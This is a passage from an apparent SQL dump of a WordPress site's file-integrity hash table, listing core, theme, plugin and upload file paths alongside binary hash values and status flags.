h�mNP���','��LH$G/�bd�+�\0ZP5��Y~�b��20p','',0,'?'),('�UY���˃��(�','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-300x250.jpg',0,'�*��c��E���','�*��c��E���','�-�ޟf��²�L��*��8Ӂ�����','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t I �C@g���','�(��(� (\'S)\0B��_}&l�&�o^s�','',0,'?'),('�����3��:���^c','wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dP�X����n��$�','dM���ksq��4�����R�^2�~B\"K�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��* [\0EE*J�r�V�s�����c�?','',0,'?'),('����@ \'�~\rV\"�','wp-content/languages/en_GB-81c889563f09dd13de1701135dc62941.json',0,'�\Z����&�]��C�x','�\Z����&�]��C�x','�,&�Îq�}?Hܫ�}�ە�/��X8[�+�~p�','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`S ����E�X�^YA�','�%��S�i����x3�k���O��nz]���','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('����퐼4��&����','wp-content/plugins/redirection/locale/redirection-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��$)�HKexf�W','؇8�|�C[��M�s\\�y����>YZ��p�c�','',0,'?'),('����SzO\"�����i�','wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b��OL=�#0��','������_�pBZ~C&0����*�R�','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U����`��/�p/G','5g��ٜ�\"���e�W��c{ǯ�x���NG�i�','',0,'?'),('�S��}������3','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME.jpg',0,'�@.6��{\"�\Zd','�@.6��{\"�\Zd','��K�6JƖ,�{>|U�[�T�p�a�:��*\\','',0,'?'),('��\\N��1\n���BZ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hsb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;U&^��A���Z\ZPbR','r5l�e�Dih�? w<e�Wݼ�U�^�','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô� ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڕ��?��d�]$>','_+)�[g\r�Msz���(�:V\"ۧ�I��w�\0s','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�� dd�H�m��G_�','��Iwm�l��,��>�z���蛑¾&{�5�','',0,'?'),('�,�1x�@e�<)�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/AccessToken.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l��6,C8\"�','L�P��h�@:̵n�ì��o�ҫ�V','',0,'?'),('�7I__����vD!���','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�!���=�[�uRJZ�','�����F<�R����u�g%g��R�\r]ܨ@�','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�Nbē�p \n��#?E','wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�±�%;�t\r���9�=','4��=�u�@YBzX5Ab�6!2c+x+!�F(�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �V,�~��H�]�d','�\"s��W���`qa�8�4�P٢V�u혧�M:�','',0,'?'),('�k��p�e�I��\\:','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��*EI���>ړH65','��ǞtX�1�%�\r\Z��D�0EE%<=vЃ��','',0,'?'),('�uGZH��Cyds�}��','wp-content/plugins/wordpress-seo/css/dist/elementor-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�\"�kC��b�9#/�','��3����<�)��I���I]\"��уj�a�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�{�[�Q-]=yAx\0�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yW`�F��a�+����','z�\n���&LMZo�ΩW�]��0���x\nɗ#�','',0,'?'),('�oW�\Zv+`TY','wp-content/uploads/2019/09/gardening.jpg',0,'�����!v$�#�Y�','�����!v$�#�Y�','�. ����S˕2\ZPۀ�Z2�<z�����k�','',0,'?'),('��/����K�E� 7','wp-content/uploads/2016/11/kitchen-2486092_960_720-updraft-pre-smush-original.jpg',0,'���4ɪ���XS���','���4ɪ���XS���','�_%H7��1؎��W�О�d����7Y0�','',0,'?'),('�O_����E�e','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/woocommerce-shop-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"Qm�\"�۾!j4`m�','�����=��\0u��D�?��v��H�ș\\�H','',0,'?'),('�BO^v�~K!���\r','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)�I�� �V�6�','���,���{F�\\sø}V�1\\_��f�t�p','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','};�F��^i�-��̡�','��(G�M@~�y�G�8����=u�Ř�G�','',0,'?'),('�}�O;U�i��<��','wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�Zϓ�}�iF ��o','���;^&`2���:�&(ƽ{ʗ��Ly9\\d�','',0,'?'),('�V���|ڑ��S##�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ZxJ�O5�w���','|��Y\"i�G�GÌ�7�:�lD��}e*��x���+','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�J��HN��ԑ','r�h,И�Q�U��2 �V�J���6}N\'3�iuK','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʼn�B��\\c�/�D��','=&�p]�Ҏ���f$�CׂP��Z��D%UcM','',0,'?'),('��{�E$��y\Zl','wp-content/uploads/2019/08/renewable-energy-300x250.jpg',0,'.>�}�6x�1�O���','.>�}�6x�1�O���','b�[��Х�c�7A6G��W6?`i\r�Ǔ�','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�/���ҝ,�\'���','wp-content/uploads/2019/06/fiber-optic-2749588_960_720-updraft-pre-smush-original.jpg',0,'��jǞ��u���c1m','��jǞ��u���c1m','X���*:l_əǢ�k^/������ȗ�\0���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r*9�����ln��','���QK�=�G�~��B�!��w~�b�_��Z','',0,'?'),('�2_���9��yoo��_','wp-content/uploads/2019/10/plumbing3.jpg',0,'�3.��r�O�@VJ�','�3.��r�O�@VJ�','�]ƃ�+��T`�|1t�A�iU]������','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��A+��z5ZS\'2��','�\r�az��|h��%sk~?�\n�0�JV �~�','',0,'?'),('�L>�;�* ��Y۞m','wp-includes/blocks/preformatted/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��%�� ��','��P��>����ꕾ�E}��aI�����\Z�p','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�(�{]��4��%��','�g\r�xF� ��ژ�2L�7켺K0�\'��?��','',0,'?'),('�f��G�߾���0\rM','wp-content/languages/plugins/redirection-en_GB.mo',0,'����\r�TV7��V�<�','����\r�TV7��V�<�','\'\0�[�!�uqu�l��2}�Z7N�?���%�#��','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�lZv�*b�DyN�`x��','wp-content/uploads/2019/10/plumber-300x198.jpg',0,'i%�З��2X\"9l�F','i%�З��2X\"9l�F','��Z\r�U�`���KW�S�?I��k�W�t��','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h��8�f2u�\0��Z�','� v�ڤn@��pz�TH�f�JM�d%�?��','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+6���J�h�','),ol��R����ZJ��eT�(y� �5����+','',0,'?'),('�~\"�H�� \Z��H�Xo','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�ImK�Teq)���6�','h�VNC����0X\r\Z�o;���!���WW�1yL','',0,'?'),('�DVe�oh�x�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VYy�9Ud�T��8�ڏ','�M��Mi M���q�q�z?��3Xk!���w�','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('�n��E�%̶�uPY�X','wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i+s�\n�����M���','^��Oj��r҇�{4y{��E�K�\0�3\'����','',0,'?'),('�ׅ���$�T{8/f','wp-content/plugins/wordpress-seo/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\0b`!����v�','>\Ze���\0�4W�\r����T�#��o���;B','',0,'?'),('�d�\'�����W�','wp-content/themes/vega/assets/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':^˾�=�X�{2б','~��RhL7�\00���DVi��ג`1R�R/�at','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���H��oPE�X�','�;���G,�P��5A;3vo��ϧs����_�','',0,'?'),('�3\\�;�m�)O','wp-content/plugins/wordpress-seo/languages/yoast-components-es_CO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\ZJ�� ^C;q+(','Mn�kH.���%&���2���d J�9��','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�0��~����','E����Y�� �C�5�f�t��A%B��W�\0�','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I �','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('�K����Y�����','wp-content/plugins/redirection/locale/redirection-en_NZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�����a�s�1','�J�?�-!\n��:�:/�ɪ����c����O�c','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W=�W�<�G��\\�z','��M�}A\0m,MgM&U�:j��Qj�K:c�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��#��\n�$^�vB��','wp-content/plugins/wordpress-seo/js/dist/elementor-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j���is���š�','�ޞ�3�\r�T���d��{|,�A.��~�bYi��','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/ �','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�.�ʹ��g�','\"�e۰�}�)�s��ѓʫt[�\"�i����/V�','',0,'?'),('���0b���������','wp-content/languages/plugins/wordpress-seo-en_GB-345506ce919600942c083126e88f887c.json',0,'�!Qy�y2(','�!Qy�y2(','�yp/�vmc�o�+vM�6�KK\ZAHQG�KPug3�','',0,'?'),('�y�-�fn6��C�','wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cw9�\'��\Zw��D�','�q�~���Ѡq/��%L�X\'�5@��\n','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]|��2�^g�C','��� ��Kx�N6r� �0��1�^_��!8','',0,'?'),('�$����Ova���8�%','wp-includes/blocks/text-columns/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u_�<�8��̆Al','!����V����jd^w!�l2ڶ�Z�Rfb%+�ؤ','',0,'?'),('�Do9Z$�$F����*','wp-content/languages/en_GB-9d47a87c240c1d10701cd6a02b28aa1b.json',0,'�z�2�yj>�cn��m�','�z�2�yj>�cn��m�','�{��R��;�V8٬��-��b�Cf��2�*','',0,'?'),('�G�?mn���<��','wp-content/uploads/2019/08/electrician-300x250.jpg',0,'бh��n�����f��r�','бh��n�����f��r�','�+o��(#h��:����ؾ��hh�/���','',0,'?'),('�I8)-�m*?�ۭ����','wp-content/themes/vega/assets/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\Z�%�\\C>|\Z�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('�O\" � r`/�l�iR�','wp-content/uploads/2019/08/electrician-300x199.jpg',0,'�*�Z��oB��ͮ','�*�Z��oB��ͮ','�g��Jc��~� ��ؼ�P�.�#�+�q tk�','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�]��Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�_�����<D��hg��','wp-includes/block-patterns/query-offset-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<H�H):�b����-','��2��۰�HOUGH�`�T��U[�av��','',0,'?'),('�c�E%D��� ��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('��6h��H[��?#�','wp-content/uploads/2019/09/garden-300x200.jpg',0,'����.��p��}�','����.��p��}�','��T�ݦd��Y����0=�� }�h�\'d��ƱV','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y#�9�b��%�\Z�(','[ܑ���+��G��8\\�/N�S�>�.i��','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��6/N���','\'$��{���i�P\'\ZTBP�<�Pp���W��','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~]�;����\\���]','�W:7B�`�\'���d����ͽݺ�t�k?u���','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('����F����R��','wp-content/uploads/2019/08/young-768x513.jpg',0,'Ʒ�@_hK�RՅ�\Z8','Ʒ�@_hK�RՅ�\Z8','<J���R������lM�|`\'5 M��-�J�-�','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('��n�(���.nk`zY','wp-content/plugins/wordpress-seo/src/conditionals/admin/estimated-reading-time-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3m9$��P��FYd�:�','� #xo���\n�P)��䖙\"g~�<�ڜ�x','',0,'?'),('��\0L������6�','wp-includes/blocks/latest-posts/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f��d�)�o��o�','��u)�0i�\0�ޛ�8�ם ��Gv9T9K�J�','',0,'?'),('����\0Idׄ���I','wp-content/languages/en_GB-569e85ef168299eb8c8f24d8ef8c8a78.json',0,'nH�vQ���J�\'','nH�vQ���J�\'','����A2aD�oCT����ҋd����r]��Es','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�APx�g\\�k-I�L','wp-content/plugins/wordpress-seo/languages/wordpress-seo-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U}�h�����x��','��L����[��_�#���75o��#l�OO','',0,'?'),('�8��U2�T�Me��','wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','벨@+�ɑ\Z~�G5 wr','���\n�_��w*Pz���*Z#�4�w,L�ue��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'����3�NZ+�R','�B73} ���`QB�f�<����[&d�!.*�','',0,'?'),('��g����F6!B','wp-content/plugins/wordpress-seo/js/dist/dynamic-blocks-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@����@ˑcVD�<�','�6��H @��R+A�a.�#�����|','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�\Z� N;�ث+���','wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�S��*#�ݱƹ��','�$V��qf #�Ӕ�&EV�/,������7�?','',0,'?'),('��}2�ѪWYq��;a{','wp-content/plugins/wordpress-seo/src/config/semrush-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���4��o`���N','q�BuK��C<��.̾�i�S�̈́�-(�\\�n','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r� S[l��','',0,'?'),('�(�Կ��ɶ۾�趮','wp-includes/js/dist/edit-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iI!��\\\Z��CU���','�)�ݰPK�0튺��:�LH��M�<ڢ�آJƔ','',0,'?'),('�>V�~Us�m�F`��','wp-content/uploads/2016/11/kitchen-2486092_960_720-768x513.jpg',0,';���h&�E<�h�\n',';���h&�E<�h�\n','b�W�@��*����o��{n^���A��g��','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Vt$�_se~!B���B','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/dsb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V7,���F','%��ߴ���i���#��\r{�PIH3��','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yAa��4�0��k\Z�','eQ���?�bt\'�u+S�\0�phI���f�Ŧ�7�','',0,'?'),('�Z��Q�!����*�','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#x�s�G�J��t��','�A�r���x?j����#��C�F�O�G-�S�$','',0,'?'),('�w�>d��?d�','wp-includes/blocks/post-featured-image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'N\n�y*g��\n2h2W','L�Pğ��EpT���CB(���f4��Z��','',0,'?'),('�y3?�cԭK��Z}r�b','wp-content/plugins/wordpress-seo/js/dist/languages/nb-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\'@�G�c`��j�','�a��l�,Aβ6(��Xgʋ����J�jA���4','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�XW+���4�\Z���','b��j��gQV+����� <��\'R���','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('��f� W5\ra�R�\nK','wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�lc�H�MT+Ֆ3��=','�7C��=.\Z���Q�r|mP��b\"p�3�','',0,'?'),('�zZ�f���ip^�2','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+ M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('��d�A+��Q�u^','wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�piȋF��IG���?y�','v�S�V�)|!�/��?��e�\0�2�4wa�<�','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T ��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('�.{�\"�=\Z $�`�<','wp-content/plugins/wordpress-seo/css/dist/adminbar-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��]ja`A�P','�S#l�f�JG���2���Q��/{l��٢','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('�ݖ���ɽ�c��q�J','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P�BͮY����','�\r���Om��Oq�{�6�כ��6`��51��$','',0,'?'),('��f���jo�3�y','wp-content/languages/en_GB-1a0cd6a7128913b15c1a10dd68951869.json',0,'��Td�ߺ<ZT� ���','��Td�ߺ<ZT� ���','���+��\nĊ�h/�ZD�ȸ��u���#RP�x�','',0,'?'),('�<n�J�|X�Ci@:','wp-content/plugins/wordpress-seo/src/integrations/duplicate-post-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���2�{�u 